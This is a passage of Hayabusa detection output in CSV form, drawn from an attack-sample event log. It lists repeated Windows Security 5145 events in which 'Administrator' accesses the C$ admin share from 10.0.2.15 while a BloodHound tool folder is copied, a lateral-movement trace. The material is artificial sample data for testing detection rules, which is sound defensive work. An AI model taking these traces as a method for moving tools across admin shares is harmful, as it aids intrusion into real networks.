Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\icons : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\components : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\icons : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-lifecycles-compat : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__\__snapshots__ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage\lcov-report : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.279 
+09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: 
\\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\__tests__ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\config : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules\react-prop-toggle : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc\wg-meetings : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib\internal : IP 
Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\regenerator-runtime : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\shims : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\rimraf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\safe-buffer : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\setimmediate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\signal-exit : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share 
Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain\tests : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\filters : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\streamers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\tests : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
